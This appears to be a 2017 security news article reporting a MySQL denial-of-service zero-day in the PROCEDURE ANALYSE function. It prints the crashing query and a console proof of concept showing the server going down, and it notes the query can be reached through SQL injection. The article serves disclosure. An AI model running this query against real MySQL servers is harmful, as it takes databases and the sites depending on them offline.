Monday, May 29, 2017
Home / Security / Exploits / New MySQL local zero-day affecting versions 5.5.45 and above

New MySQL local zero-day affecting versions 5.5.45 and above

A new MySQL zero-day has been discovered by Osanda Malith a security researcher and reverse engineer.

This zero-day allows the attacker to perform a denial of service (DOS) attack on any server running MySQL versions 5.5.45 and above.  This exploit exists in the procedure analyse() function and crashes when passing this sub query:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

Here’s a proof of concept (POC) provided by Osanda:

---------------------------------------------------------------------------------------------------------------
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server
 mysql>
---------------------------------------------------------------------------------------------------------------

After executing the command, MySQL will become unresponsive, preventing the site from working. Obviously access to the SQl database will be needed, but this can be done if the site is vulnerable to an SQL injection.

MySQL-local-dos

Video POC:

For a more in depth analysis, visit Osanda’s blog, here.

Download his POC script written in Python, here.

About Kyle

Co-owner, writer and editor at Zerosecurity. Security and tech enthusiast. Programmer. Music lover and avid festival goer.

Check Also

Amazon hacked – hacker leaks 80,000 login credentials

A hacker going by the name 0x2Taylor has said to have breached the servers of …